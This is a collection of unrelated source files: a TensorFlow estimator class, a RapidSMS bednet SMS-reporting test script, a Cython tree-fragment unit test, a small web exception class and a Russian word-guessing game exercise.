""" @deprecated_arg_values( _FIX_GLOBAL_STEP_INCREMENT_DATE, _FIX_GLOBAL_STEP_INCREMENT_INSTRUCTIONS, fix_global_step_increment_bug=False) def __init__(self, # _joint_linear_weights pylint: disable=invalid-name model_dir=None, weight_column_name=None, linear_feature_columns=None, linear_optimizer=None, _joint_linear_weights=False, dnn_feature_columns=None, dnn_optimizer=None, dnn_hidden_units=None, dnn_activation_fn=nn.relu, dnn_dropout=None, gradient_clip_norm=None, enable_centered_bias=False, label_dimension=1, config=None, feature_engineering_fn=None, embedding_lr_multipliers=None, input_layer_min_slice_size=None, fix_global_step_increment_bug=False): """Initializes a DNNLinearCombinedRegressor instance. Note: New users must set `fix_global_step_increment_bug=True` when creating an estimator. Args: model_dir: Directory to save model parameters, graph and etc. This can also be used to load checkpoints from the directory into a estimator to continue training a previously saved model. weight_column_name: A string defining feature column name representing weights. It is used to down weight or boost examples during training. It will be multiplied by the loss of the example. linear_feature_columns: An iterable containing all the feature columns used by linear part of the model. All items in the set must be instances of classes derived from `FeatureColumn`. linear_optimizer: An instance of `tf.Optimizer` used to apply gradients to the linear part of the model. If `None`, will use a FTRL optimizer. _joint_linear_weights: If True a single (possibly partitioned) variable will be used to store the linear model weights. It's faster, but requires that all columns are sparse and have the 'sum' combiner. dnn_feature_columns: An iterable containing all the feature columns used by deep part of the model. All items in the set must be instances of classes derived from `FeatureColumn`. dnn_optimizer: An instance of `tf.Optimizer` used to apply gradients to the deep part of the model. If `None`, will use an Adagrad optimizer. dnn_hidden_units: List of hidden units per layer. All layers are fully connected. dnn_activation_fn: Activation function applied to each layer. If None, will use `tf.nn.relu`. dnn_dropout: When not None, the probability we will drop out a given coordinate. gradient_clip_norm: A float > 0. If provided, gradients are clipped to their global norm with this clipping ratio. See tf.clip_by_global_norm for more details. enable_centered_bias: A bool. If True, estimator will learn a centered bias variable for each class. Rest of the model structure learns the residual after centered bias. label_dimension: Number of regression targets per example. This is the size of the last dimension of the labels and logits `Tensor` objects (typically, these have shape `[batch_size, label_dimension]`). config: RunConfig object to configure the runtime settings. feature_engineering_fn: Feature engineering function. Takes features and labels which are the output of `input_fn` and returns features and labels which will be fed into the model. embedding_lr_multipliers: Optional. A dictionary from `EmbeddingColumn` to a `float` multiplier. Multiplier will be used to multiply with learning rate for the embedding variables. input_layer_min_slice_size: Optional. The min slice size of input layer partitions. If not provided, will use the default of 64M. fix_global_step_increment_bug: If `False`, the estimator needs two fit steps to optimize both linear and dnn parts. If `True`, this bug is fixed. 
New users must set this to `True`, but it the default value is `False` for backwards compatibility. Raises: ValueError: If both linear_feature_columns and dnn_features_columns are empty at the same time. """ linear_feature_columns = linear_feature_columns or [] dnn_feature_columns = dnn_feature_columns or [] self._feature_columns = linear_feature_columns + dnn_feature_columns if not self._feature_columns: raise ValueError("Either linear_feature_columns or dnn_feature_columns " "must be defined.") # TODO(b/35922130): Replace with `input_layer_partitioner` arg. input_layer_partitioner = None if input_layer_min_slice_size is not None: input_layer_partitioner = ( partitioned_variables.min_max_variable_partitioner( max_partitions=config.num_ps_replicas if config else 0, min_slice_size=input_layer_min_slice_size)) head = head_lib.regression_head( weight_column_name=weight_column_name, label_dimension=label_dimension, enable_centered_bias=enable_centered_bias) super(DNNLinearCombinedRegressor, self).__init__( model_fn=_dnn_linear_combined_model_fn, model_dir=model_dir, config=config, params={ "head": head, "linear_feature_columns": linear_feature_columns, "linear_optimizer": linear_optimizer, "joint_linear_weights": _joint_linear_weights, "dnn_feature_columns": dnn_feature_columns, "dnn_optimizer": dnn_optimizer, "dnn_hidden_units": dnn_hidden_units, "dnn_activation_fn": dnn_activation_fn, "dnn_dropout": dnn_dropout, "gradient_clip_norm": gradient_clip_norm, "embedding_lr_multipliers": embedding_lr_multipliers, "input_layer_partitioner": input_layer_partitioner, "fix_global_step_increment_bug": fix_global_step_increment_bug, }, feature_engineering_fn=feature_engineering_fn) def evaluate(self, x=None, y=None, input_fn=None, feed_fn=None, batch_size=None, steps=None, metrics=None, name=None, checkpoint_path=None, hooks=None): """See evaluable.Evaluable.""" # TODO(zakaria): remove once deprecation is finished (b/31229024) custom_metrics = {} if metrics: for key, metric in six.iteritems(metrics): if (not isinstance(metric, metric_spec.MetricSpec) and not isinstance(key, tuple)): custom_metrics[(key, prediction_key.PredictionKey.SCORES)] = metric else: custom_metrics[key] = metric return super(DNNLinearCombinedRegressor, self).evaluate( x=x, y=y, input_fn=input_fn, feed_fn=feed_fn, batch_size=batch_size, steps=steps, metrics=custom_metrics, name=name, checkpoint_path=checkpoint_path, hooks=hooks) @deprecated_arg_values( estimator.AS_ITERABLE_DATE, estimator.AS_ITERABLE_INSTRUCTIONS, as_iterable=False) @deprecated_arg_values( "2017-03-01", "Please switch to predict_scores, or set `outputs` argument.", outputs=None) def predict(self, x=None, input_fn=None, batch_size=None, outputs=None, as_iterable=True): """Returns predictions for given features. By default, returns predicted scores. But this default will be dropped soon. Users should either pass `outputs`, or call `predict_scores` method. Args: x: features. input_fn: Input function. If set, x must be None. batch_size: Override default batch size. outputs: list of `str`, name of the output to predict. If `None`, returns scores. as_iterable: If True, return an iterable which keeps yielding predictions for each example until inputs are exhausted. Note: The inputs must terminate if you want the iterable to terminate (e.g. be sure to pass num_epochs=1 if you are using something like read_batch_features). Returns: Numpy array of predicted scores (or an iterable of predicted scores if as_iterable is True). 
If `label_dimension == 1`, the shape of the output is `[batch_size]`, otherwise the shape is `[batch_size, label_dimension]`. If `outputs` is set, returns a dict of predictions. """ if not outputs: return self.predict_scores( x=x, input_fn=input_fn, batch_size=batch_size, as_iterable=as_iterable) return super(DNNLinearCombinedRegressor, self).predict( x=x, input_fn=input_fn, batch_size=batch_size, outputs=outputs, as_iterable=as_iterable) @deprecated_arg_values( estimator.AS_ITERABLE_DATE, estimator.AS_ITERABLE_INSTRUCTIONS, as_iterable=False) def predict_scores(self, x=None, input_fn=None, batch_size=None, as_iterable=True): """Returns predicted scores for given features. Args: x: features. input_fn: Input function. If set, x must be None. batch_size: Override default batch size. as_iterable: If True, return an iterable which keeps yielding predictions for each example until inputs are exhausted. Note: The inputs must terminate if you want the iterable to terminate (e.g. be sure to pass num_epochs=1 if you are using something like read_batch_features). Returns: Numpy array of predicted scores (or an iterable of predicted scores if as_iterable is True). If `label_dimension == 1`, the shape of the output is `[batch_size]`, otherwise the shape is `[batch_size, label_dimension]`. """ key = prediction_key.PredictionKey.SCORES preds = super(DNNLinearCombinedRegressor, self).predict( x=x, input_fn=input_fn, batch_size=batch_size, outputs=[key], as_iterable=as_iterable) if as_iterable: return (pred[key] for pred in preds) return preds[key] @deprecated("2017-03-25", "Please use Estimator.export_savedmodel() instead.") def export(self, export_dir, input_fn=None, input_feature_key=None, use_deprecated_input_fn=True, signature_fn=None, default_batch_size=1, exports_to_keep=None): """See BaseEstimator.export.""" def default_input_fn(unused_estimator, examples): return layers.parse_feature_columns_from_examples( examples, self._feature_columns) return super(DNNLinearCombinedRegressor, self).export( export_dir=export_dir, input_fn=input_fn or default_input_fn, input_feature_key=input_feature_key, use_deprecated_input_fn=use_deprecated_input_fn, signature_fn=signature_fn or export.regression_signature_fn, prediction_key=prediction_key.PredictionKey.SCORES, default_batch_size=default_batch_size, exports_to_keep=exports_to_keep) # Aliases # TODO(zakaria): Remove these aliases, See b/34751732 _DNNLinearCombinedEstimator = DNNLinearCombinedEstimator
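A note on usage: unlike the classifier and regressor classes above, the `DNNLinearCombinedEstimator` docstring carries no example. The sketch below is not part of the original file; it is a minimal, hedged illustration assuming the deprecated tf.contrib.learn API is still importable. The feature columns, hidden units, and the commented-out input functions are invented for illustration only.

```python
# Hypothetical usage sketch for DNNLinearCombinedEstimator (tf.contrib.learn).
# Feature columns, hidden units and input_fn names are illustrative assumptions.
from tensorflow.contrib import layers
from tensorflow.contrib.learn.python.learn.estimators import head as head_lib
from tensorflow.contrib.learn.python.learn.estimators.dnn_linear_combined import (
    DNNLinearCombinedEstimator)

# A dense column for the DNN part and a sparse column for the linear part.
age = layers.real_valued_column("age")
occupation = layers.sparse_column_with_hash_bucket(
    "occupation", hash_bucket_size=1000)
occupation_emb = layers.embedding_column(occupation, dimension=8)

estimator = DNNLinearCombinedEstimator(
    head=head_lib.multi_class_head(n_classes=2),
    linear_feature_columns=[occupation],
    dnn_feature_columns=[age, occupation_emb],
    dnn_hidden_units=[64, 32],
    # Per the deprecation notice above, new users should always pass True here.
    fix_global_step_increment_bug=True)

# estimator.fit(input_fn=my_train_input_fn, steps=1000)   # my_train_input_fn is assumed
# estimator.evaluate(input_fn=my_eval_input_fn)           # my_eval_input_fn is assumed
```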
rapidsms/rapidsms-legacy
refs/heads/master
apps/bednets/tests.py
4
from rapidsms.tests.scripted import TestScript from form.models import * from reporters.models import * import reporters.app as reporter_app import supply.app as supply_app import form.app as form_app import default.app as default_app from app import App from django.core.management.commands.dumpdata import Command import time import random import os from datetime import datetime class TestApp (TestScript): #apps = (reporter_app.App, App,form_app.App, supply_app.App, default_app.App ) apps = (reporter_app.App, App,form_app.App, supply_app.App ) # the test_backend script does the loading of the dummy backend that allows reporters # to work properly in tests fixtures = ['nigeria_llin', 'test_kano_locations', 'test_backend'] def setUp(self): TestScript.setUp(self) def testFixtures(self): self._testKanoLocations() self._testForms() self._testRoles() def testScript(self): a = """ 8005551219 > llin register 20 dl crummy user 8005551219 < Hello crummy! You are now registered as Distribution point team leader at KANO State. """ self.runScript(a) # this should succeed because we just created him reporters = Reporter.objects.all() Reporter.objects.get(alias="cuser") dict = {"alias":"fail"} # make sure checking a non-existant user fails self.assertRaises(Reporter.DoesNotExist, Reporter.objects.get, **dict) testRegistration = """ 8005551212 > llin my status 8005551212 < Please register your phone with RapidSMS. 8005551212 > llin register 20 dl dummy user 8005551212 < Hello dummy! You are now registered as Distribution point team leader at KANO State. 8005551212 > llin my status 8005551212 < I think you are dummy user. #duplicate submission test_reg_dup > llin register 20 dl duplicate user test_reg_dup < Hello duplicate! You are now registered as Distribution point team leader at KANO State. # this one should be a duplicate test_reg_dup > llin register 20 dl duplicate user test_reg_dup < Hello again duplicate! You are already registered as a Distribution point team leader at KANO State. # but all of these should create a new registration test_reg_dup > llin register 20 dl duplicate user withanothername test_reg_dup < Hello duplicate! You are now registered as Distribution point team leader at KANO State. test_reg_dup > llin register 20 dl duplicate userlonger test_reg_dup < Hello duplicate! You are now registered as Distribution point team leader at KANO State. test_reg_dup > llin register 20 dl duplicated user test_reg_dup < Hello duplicated! You are now registered as Distribution point team leader at KANO State. test_reg_dup > llin register 20 sm duplicate user test_reg_dup < Hello duplicate! You are now registered as Stock manager at KANO State. test_reg_dup > llin register 2001 dl duplicate user test_reg_dup < Hello duplicate! You are now registered as Distribution point team leader at AJINGI LGA. # case sensitivity test_reg_2 > llin REGISTER 20 dl another user test_reg_2 < Hello another! You are now registered as Distribution point team leader at KANO State. # different name formats test_reg_3 > llin register 20 dl onename test_reg_3 < Hello onename! You are now registered as Distribution point team leader at KANO State. # these fail test_reg_4 > llin register 20 dl mister three names test_reg_4 < Hello mister! You are now registered as Distribution point team leader at KANO State. test_reg_5 > llin register 20 dl mister four name guy test_reg_5 < Hello mister! You are now registered as Distribution point team leader at KANO State. 
# some other spellings test_reg_short > llin regstr 20 dl short user test_reg_short < Hello short! You are now registered as Distribution point team leader at KANO State. test_reg_short_2 > llin regs 20 dl short user test_reg_short_2 < Hello short! You are now registered as Distribution point team leader at KANO State. test_reg_short_3 > llin reg 20 dl short user test_reg_short_3 < Hello short! You are now registered as Distribution point team leader at KANO State. test_reg_long > llin registered 20 dl long user test_reg_long < Hello long! You are now registered as Distribution point team leader at KANO State. # extra spaces test_reg_8 > llin register 20 dl space guy test_reg_8 < Hello space! You are now registered as Distribution point team leader at KANO State. # new tests for more flexible roles test_reg_dl > llin register 20 dl distribution leader test_reg_dl < Hello distribution! You are now registered as Distribution point team leader at KANO State. test_reg_dl_2 > llin register 20 ds distribution leader test_reg_dl_2 < Hello distribution! You are now registered as Distribution point team leader at KANO State. test_reg_dl_3 > llin register 20 dm distribution leader test_reg_dl_3 < Hello distribution! You are now registered as Distribution point team leader at KANO State. test_reg_dl_4 > llin register 20 dp distribution leader test_reg_dl_4 < Hello distribution! You are now registered as Distribution point team leader at KANO State. test_reg_lf > llin register 20 lf lga focal person test_reg_lf < Hello lga! You are now registered as LGA focal person at KANO State. test_reg_lf > llin register 20 lp lga focal person test_reg_lf < Hello again lga! You are already registered as a LGA focal person at KANO State. # alas, we're not perfect test_reg_fail > llin rgstr 20 dl sorry guy test_reg_fail < Sorry we didn't understand that. Available forms are LLIN: REGISTER, NETCARDS, NETS, RECEIVE, ISSUE """ testRegistrationErrors = """ 12345 > llin my status 12345 < Please register your phone with RapidSMS. 12345 > llin register 45 DL hello world 12345 < Invalid form. 45 not in list of location codes 12345 > llin my status 12345 < Please register your phone with RapidSMS. 12345 > llin register 20 pp hello world 12345 < Invalid form. Unknown role code: pp 12345 > llin my status 12345 < Please register your phone with RapidSMS. 12345 > llin register 6803 AL hello world 12345 < Invalid form. 6803 not in list of location codes. Unknown role code: AL 12345 > llin my status 12345 < Please register your phone with RapidSMS. """ testKeyword= """ tkw_1 > llin register 20 dl keyword tester tkw_1 < Hello keyword! You are now registered as Distribution point team leader at KANO State. # base case tkw_1 > llin nets 2001 123 456 78 90 tkw_1 < Thank you keyword. Received report for LLIN NETS: location=AJINGI, distributed=123, expected=456, actual=78, discrepancy=90 # capitalize the domain tkw_1 > LLIN nets 2001 123 456 78 90 tkw_1 < Thank you keyword. Received report for LLIN NETS: location=AJINGI, distributed=123, expected=456, actual=78, discrepancy=90 # drop an L tkw_1 > lin nets 2001 123 456 78 90 tkw_1 < Thank you keyword. Received report for LLIN NETS: location=AJINGI, distributed=123, expected=456, actual=78, discrepancy=90 # mix the order - this is no longer supported #tkw_1 > ILLn nets 2001 123 456 78 90 #tkw_1 < Thank you keyword. Received report for LLIN NETS: location=AJINGI, distributed=123, expected=456, actual=78, discrepancy=90 #tkw_1 > ilin nets 2001 123 456 78 90 #tkw_1 < Thank you keyword. 
Received report for LLIN NETS: location=AJINGI, distributed=123, expected=456, actual=78, discrepancy=90 # ll anything works? tkw_1 > ll nets 2001 123 456 78 90 tkw_1 < Thank you keyword. Received report for LLIN NETS: location=AJINGI, distributed=123, expected=456, actual=78, discrepancy=90 tkw_1 > llan nets 2001 123 456 78 90 tkw_1 < Thank you keyword. Received report for LLIN NETS: location=AJINGI, distributed=123, expected=456, actual=78, discrepancy=90 # don't support w/o keyword tkw_1 > nets 2001 123 456 78 90 # the default app to the rescue! tkw_1 < Sorry we didn't understand that. Available forms are LLIN: REGISTER, NETCARDS, NETS, RECEIVE, ISSUE """ testNets= """ 8005551213 > llin register 2001 lf net guy 8005551213 < Hello net! You are now registered as LGA focal person at AJINGI LGA. 8005551213 > llin nets 2001 123 456 78 90 8005551213 < Thank you net. Received report for LLIN NETS: location=AJINGI, distributed=123, expected=456, actual=78, discrepancy=90 8005551213 > llin nets 2001 123 456 78 8005551213 < Invalid form. The following fields are required: discrepancy # test some of the different form prefix options # case sensitivity 8005551213 > llin NETS 2001 123 456 78 90 8005551213 < Thank you net. Received report for LLIN NETS: location=AJINGI, distributed=123, expected=456, actual=78, discrepancy=90 # no s 8005551213 > llin net 2001 123 456 78 90 8005551213 < Thank you net. Received report for LLIN NETS: location=AJINGI, distributed=123, expected=456, actual=78, discrepancy=90 # really? this works? 8005551213 > llin Nt 2001 123 456 78 90 8005551213 < Thank you net. Received report for LLIN NETS: location=AJINGI, distributed=123, expected=456, actual=78, discrepancy=90 # something's gotta fail 8005551213 > llin n 2001 123 456 78 90 8005551213 < Sorry we didn't understand that. Available forms are LLIN: REGISTER, NETCARDS, NETS, RECEIVE, ISSUE 8005551213 > llin bednets 2001 123 456 78 90 8005551213 < Sorry we didn't understand that. Available forms are LLIN: REGISTER, NETCARDS, NETS, RECEIVE, ISSUE 8005551213 > llin ents 2001 123 456 78 90 8005551213 < Sorry we didn't understand that. Available forms are LLIN: REGISTER, NETCARDS, NETS, RECEIVE, ISSUE """ testNetCards= """ 8005551214 > llin register 200201 lf card guy 8005551214 < Hello card! You are now registered as LGA focal person at ALBASU CENTRAL Ward. 8005551214 > llin net cards 200201 123 456 78 8005551214 < Thank you card. Received report for LLIN NET CARDS: location=ALBASU CENTRAL, settlements=123, people=456, distributed=78 8005551214 > llin net cards 200201 123 456 8005551214 < Invalid form. The following fields are required: issued # test some of the different form prefix options # case sensitivity 8005551214 > llin NET CARDS 200201 123 456 78 8005551214 < Thank you card. Received report for LLIN NET CARDS: location=ALBASU CENTRAL, settlements=123, people=456, distributed=78 # no s 8005551214 > llin net card 200201 123 456 78 8005551214 < Thank you card. Received report for LLIN NET CARDS: location=ALBASU CENTRAL, settlements=123, people=456, distributed=78 # one word 8005551214 > llin netcards 200201 123 456 78 8005551214 < Thank you card. Received report for LLIN NET CARDS: location=ALBASU CENTRAL, settlements=123, people=456, distributed=78 8005551214 > llin netcard 200201 123 456 78 8005551214 < Thank you card. Received report for LLIN NET CARDS: location=ALBASU CENTRAL, settlements=123, people=456, distributed=78 # he he 8005551214 > llin nt cd 200201 123 456 78 8005551214 < Thank you card. 
Received report for LLIN NET CARDS: location=ALBASU CENTRAL, settlements=123, people=456, distributed=78 8005551214 > llin ntcrds 200201 123 456 78 8005551214 < Thank you card. Received report for LLIN NET CARDS: location=ALBASU CENTRAL, settlements=123, people=456, distributed=78 # something's gotta fail 8005551214 > llin cards 200201 123 456 78 8005551214 < Sorry we didn't understand that. Available forms are LLIN: REGISTER, NETCARDS, NETS, RECEIVE, ISSUE """ testUnregisteredSubmissions = """ tus_1 > llin net cards 200201 123 456 78 tus_1 < Received report for LLIN NET CARDS: location=ALBASU CENTRAL, settlements=123, people=456, distributed=78. Please register your phone tus_1 > llin my status tus_1 < Please register your phone with RapidSMS. tus_2 > llin nets 2001 123 456 78 90 tus_2 < Received report for LLIN NETS: location=AJINGI, distributed=123, expected=456, actual=78, discrepancy=90. Please register your phone tus_2 > llin my status tus_2 < Please register your phone with RapidSMS. """ def testGenerateNetFixtures(self): """ This isn't actually a test. It just takes advantage of the test harness to spam a bunch of messages to the nigeria app and spit out the data in a format that can be sucked into a fixture. It should be moved to some data generator at some point, but is being left here for laziness sake """ # this is the number of net reports that will be generated count = 0 # the sender will always be the same, for now phone = "55555" expected_actual_match_percent = .8 # allow specifying the minimum and maximum dates for message generation min_date = datetime(2009,4,1) max_date = datetime(2009,4,30) min_time = time.mktime(min_date.timetuple()) max_time = time.mktime(max_date.timetuple()) # these are the locations that will be chosen. The actual # location will be a distribution point under one of these # wards wards = [200101, 200102, 200103, 200104, 200105, 200106, 200107, 200108, 200109, 200110, 200201] all_net_strings = [] for i in range(count): # this first part generates a net form at a random DP date = datetime.fromtimestamp(random.randint(min_time, max_time)) ward = Location.objects.get(code=random.choice(wards)) dp = random.choice(ward.children.all()) distributed = random.randint(50,500) expected = random.randint(0,2000) # create an actual amount based on the likelihood of match if random.random() < expected_actual_match_percent: actual = expected else: actual = random.randint(0,2000) discrepancy = random.randint(0,distributed/5) net_string = "%s@%s > llin nets %s %s %s %s %s" % (phone, date.strftime("%Y%m%d%H%M"), dp.code, distributed, expected, actual, discrepancy) all_net_strings.append(net_string) # the second part generates a net card form at a random MT date = datetime.fromtimestamp(random.randint(min_time, max_time)) ward = Location.objects.get(code=random.choice(wards)) dp = random.choice(ward.children.all()) mt = random.choice(dp.children.all()) settlements = random.randint(3, 50) people = random.randint(50, 600) coupons = random.randint(50, 600) net_card_string = "%s@%s > llin net cards %s %s %s %s" % (phone, date.strftime("%Y%m%d%H%M"), mt.code, settlements, people, coupons ) all_net_strings.append(net_card_string) script = "\n".join(all_net_strings) self.runScript(script) dumpdata = Command() filename = os.path.abspath(os.path.join(os.path.dirname(__file__),"fixtures/test_net_data.json")) options = { "indent" : 2 } datadump = dumpdata.handle("bednets", **options) # uncomment these lines to save the fixture # file = open(filename, "w") # file.write(datadump) # 
file.close() # print "=== Successfully wrote fixtures to %s ===" % filename # def _testKanoLocations(self): #TODO test for DPs and MTs loc_types = LocationType.objects.all() self.assertEqual(6, len(loc_types)) state = LocationType.objects.get(name="State") lga = LocationType.objects.get(name="LGA") ward = LocationType.objects.get(name="Ward") locations = Location.objects.all() # 1 state self.assertEqual(1, len(locations.filter(type=state))) # 44 lgas self.assertEqual(44, len(locations.filter(type=lga))) # 484 wards self.assertEqual(484, len(locations.filter(type=ward))) kano = locations.get(type=state) self.assertEqual("KANO", kano.name) self.assertEqual(44, len(kano.children.all())) for lga in locations.filter(type=lga): self.assertEqual(kano, lga.parent) def _testForms(self): forms = Form.objects.all() self.assertEqual(5, len(forms)) for form_name in ["register", "issue", "receive", "nets", "netcards"]: # this will throw an error if it doesn't exist Form.objects.get(code__abbreviation=form_name) def _testRoles(self): # add this when we have a fixture for roles roles = Role.objects.all() self.assertEqual(4, len(roles)) for role_name in ["LGA focal person", "Ward supervisor", "Stock manager", "Distribution point team leader"]: # this will throw an error if it doesn't exist Role.objects.get(name=role_name)
PeterWangIntel/chromium-crosswalk
refs/heads/master
third_party/cython/src/Cython/Compiler/Tests/TestTreeFragment.py
131
from Cython.TestUtils import CythonTest from Cython.Compiler.TreeFragment import * from Cython.Compiler.Nodes import * from Cython.Compiler.UtilNodes import * import Cython.Compiler.Naming as Naming class TestTreeFragments(CythonTest): def test_basic(self): F = self.fragment(u"x = 4") T = F.copy() self.assertCode(u"x = 4", T) def test_copy_is_taken(self): F = self.fragment(u"if True: x = 4") T1 = F.root T2 = F.copy() self.assertEqual("x", T2.stats[0].if_clauses[0].body.lhs.name) T2.stats[0].if_clauses[0].body.lhs.name = "other" self.assertEqual("x", T1.stats[0].if_clauses[0].body.lhs.name) def test_substitutions_are_copied(self): T = self.fragment(u"y + y").substitute({"y": NameNode(pos=None, name="x")}) self.assertEqual("x", T.stats[0].expr.operand1.name) self.assertEqual("x", T.stats[0].expr.operand2.name) self.assert_(T.stats[0].expr.operand1 is not T.stats[0].expr.operand2) def test_substitution(self): F = self.fragment(u"x = 4") y = NameNode(pos=None, name=u"y") T = F.substitute({"x" : y}) self.assertCode(u"y = 4", T) def test_exprstat(self): F = self.fragment(u"PASS") pass_stat = PassStatNode(pos=None) T = F.substitute({"PASS" : pass_stat}) self.assert_(isinstance(T.stats[0], PassStatNode), T) def test_pos_is_transferred(self): F = self.fragment(u""" x = y x = u * v ** w """) T = F.substitute({"v" : NameNode(pos=None, name="a")}) v = F.root.stats[1].rhs.operand2.operand1 a = T.stats[1].rhs.operand2.operand1 self.assertEquals(v.pos, a.pos) def test_temps(self): TemplateTransform.temp_name_counter = 0 F = self.fragment(u""" TMP x = TMP """) T = F.substitute(temps=[u"TMP"]) s = T.body.stats self.assert_(isinstance(s[0].expr, TempRefNode)) self.assert_(isinstance(s[1].rhs, TempRefNode)) self.assert_(s[0].expr.handle is s[1].rhs.handle) if __name__ == "__main__": import unittest unittest.main()
dhocker/ahps_web
refs/heads/master
ahps_web/views/view_exception.py
1
# # AHPS Web - web server for managing an AtHomePowerlineServer instance # Copyright (C) 2014, 2015 Dave Hocker (email: AtHomeX10@gmail.com) # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, version 3 of the License. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. # See the LICENSE file for more details. # # You should have received a copy of the GNU General Public License # along with this program (the LICENSE file). If not, see <http://www.gnu.org/licenses/>. # class ViewException(Exception): """ View detected exception. """ status_code = 500 def __init__(self, message, status_code=None, payload=None): Exception.__init__(self) self.message = message if status_code is not None: self.status_code = status_code self.payload = payload def to_dict(self): rv = dict(self.payload or ()) rv['message'] = self.message return rv
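`ViewException` carries an HTTP status code plus an optional payload and flattens both via `to_dict()`, which implies the surrounding web framework is expected to turn it into a JSON error response. The sketch below is not part of view_exception.py; it assumes a Flask application object, and the handler name, route, and field names are invented purely for illustration.

```python
# Hypothetical sketch: converting ViewException into a JSON error response.
# Assumes a Flask app; the route and names below are illustrative only.
from flask import Flask, jsonify

from ahps_web.views.view_exception import ViewException

app = Flask(__name__)


@app.errorhandler(ViewException)
def handle_view_exception(error):
    # to_dict() merges the optional payload with the human-readable message.
    response = jsonify(error.to_dict())
    response.status_code = error.status_code
    return response


@app.route("/devices/<int:device_id>")
def get_device(device_id):
    # Raising the exception anywhere in a view yields a structured JSON error.
    raise ViewException("Unknown device id", status_code=404,
                        payload={"device_id": device_id})
```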
Mariaanisimova/pythonintask
refs/heads/master
BITs/2014/Abdrahmanova_G_I/task_9_1.py
1
#Task 9. Variant 1.
#Create a game in which the computer picks a word and the player has to guess it. The computer tells the player how many letters the word has and gives five attempts to find out whether a given letter occurs in the word; the program may only answer "Да" (yes) or "Нет" (no). After that the player must try to guess the word.
import random
WORDS=("питон", "скорпион", "тритон", "крокодил", "ягуар", "леопард", "павлин", "антилопа")
word=random.choice(WORDS)
live=5
bukva=""
slovo=""
number=len(word)
print("Компьютер загадал слово. Твоя цель угадать его. \nВ этом слове ",str(number)," букв.")
print("У тебя "+str(live)+" попыток угадать буквы.")
while live>0:
    bukva=input("Введите букву\n")
    if bukva in list(word):
        print("Да")
        live=live-1
    else:
        print("Нет")
        live=live-1
if live==0:
    slovo=input("Ваши попытки кончились. \nВведите слово\n")
    if slovo==word:
        print("Поздравляю! Вы угадали слово :)")
    else:
        print("Вы не угадали слово :(")
input("Нажмите Enter")
#Abdrahmanova G. I.
#11.04.2016